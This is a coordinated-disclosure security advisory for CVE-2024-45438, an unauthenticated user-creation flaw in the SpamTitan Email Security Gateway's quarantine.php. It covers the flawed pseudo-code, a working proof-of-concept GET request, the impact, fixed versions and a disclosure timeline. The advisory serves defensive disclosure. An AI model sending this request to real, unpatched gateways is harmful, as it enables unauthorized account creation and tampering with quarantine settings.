Seralys Security Advisory | https://www.seralys.com/research ====================================================================== Title: Unauthenticated User Creation Product: SpamTitan Email Security Gateway Affected: Confirmed on 8.00.95 Fixed in: 8.00.101 and 8.01.14 Vendor: TitanHQ Discovered: May 2024 Severity: HIGH CWE: CWE-306: Missing Authentication for Critical Function CVE: CVE-2024-45438 CVSS: 8.6 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H) Discovered by: Philippe Caturegli (Seralys) & Julian B. ====================================================================== Overview -------- The file `quarantine.php` within the SpamTitan interface allows unauthenticated users to trigger account-level actions using a crafted GET request. Notably, when a non-existent email address is provided as part of the `email` parameter, SpamTitan will automatically create a user record and associate quarantine settings with it — all without requiring authentication. This allows an attacker to manipulate internal application behavior or inject data into the user base, potentially leading to privilege escalation paths or information leaks in misconfigured environments. ====================================================================== Technical Details ----------------- Affected Endpoint: ------------------ `quarantine.php` Unauthenticated request triggers user creation: ``` /quarantine.php?language=en&role_type=admin&action=setperiod& email=admin@attacker.com&period=WD&secret_id=1 ``` Pseudo-code logic: ``` $email = $_GET['email']; if (!empty($email)) { $user_id = db_getmaddr_id($email); } ``` Helper function (simplified behavior): ``` function db_getmaddr_id($email, $create = 1) { if (not exists in `maddr` table and $create == 1) { INSERT INTO maddr (email, domain) } return user_id; } ``` - Because `db_getmaddr_id($email)` is invoked with only one argument, the default value `$create = 1` is used, which triggers implicit user creation. - No session or authentication checks are performed prior to executing the action. - The `role_type` parameter (e.g., `admin`) is accepted via query string but never validated. ====================================================================== Proof of Concept ----------------- Send the following GET request without authentication: ``` GET /quarantine.php?language=en&role_type=admin&action=setperiod& email=user@attacker.com&period=WD&secret_id=1 HTTP/1.1 Host: spamtitan.local ``` Effect: - A new user `user@attacker.com` is silently created. - Digest preference is set to "weekly". - No authentication or token is required. ====================================================================== Impact ------- - Unauthenticated creation of internal user records - Manipulation of quarantine report settings for arbitrary emails - Potential for denial of service or persistence via spam report hijacking - Expands the application attack surface for further exploitation ====================================================================== Vendor Response --------------- TitanHQ implemented fixes for this vulnerability as part of a coordinated disclosure effort. The issue has been resolved in the following versions: - SpamTitan Gateway v.8.00.101 - SpamTitan Gateway v.8.01.14 Note: if a customer has set the token expiration period to 0 (disabling tokens), then it would still be possible to add users. The quarantine settings page now shows a warning if a customer has this set to 0, and going forward it is not possible to set the token expiration period lower than 1 ====================================================================== Timeline -------- - 2024-05-12: Vulnerability discovered during a pentest - 2025-04-28: Advisory drafted (we kind of forgot about that vuln :)) - 2025-04-28: Initial advisory submitted to TitanHQ - 2025-05-06: Follow up #1 from Seralys - 2025-05-16: Follow up #2 from Seralys - 2025-05-19: TitanHQ acknowledged receipt and initiated coordination - 2025-06-13: TitanHQ publicly released a fix in v 8.00.101 and 8.01.14 - 2025-08-20: Public disclosure by Seralys ====================================================================== About Seralys -------------- Seralys is a boutique penetration testing firm with offices in Europe and North America. We provide high value-add penetration testing and security assessments. https://www.seralys.com ====================================================================== Acknowledgments --------------- Special shoutout to our fellow researchers at BastardLabs. \m/ ====================================================================== Disclaimer ---------- This advisory is provided for coordinated disclosure purposes only. Reproduction or distribution for malicious use is strictly prohibited. EOF